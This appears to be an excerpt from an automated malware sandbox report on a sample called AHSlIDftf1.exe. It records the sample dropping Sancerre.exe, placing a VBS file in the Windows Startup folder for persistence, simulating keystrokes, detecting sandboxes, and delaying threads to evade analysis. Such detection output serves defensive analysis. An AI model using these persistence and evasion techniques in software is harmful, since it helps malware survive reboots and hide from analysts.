                  Source: Binary string: wntdll.pdb source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
                  Source: AHSlIDftf1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: AHSlIDftf1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: AHSlIDftf1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: AHSlIDftf1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: AHSlIDftf1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D542DE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D70A76 push ecx; ret 0_2_00D70A89
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00590A76 push ecx; ret 1_2_00590A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CE02DD push ebx; retf 2_2_00CE02DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01239C30 push esp; retf 0127h8_2_01239D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06939233 push es; ret 8_2_06939244
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile created: C:\Users\user\AppData\Local\konked\Sancerre.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbsJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D6F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00D6F98E
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DE1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00DE1C41
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0058F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_0058F98E
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00601C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00601C41
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97722
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeAPI/Special instruction interceptor: Address: 107AF0C
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeAPI/Special instruction interceptor: Address: 1744284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599517Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598366Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598196Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598081Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
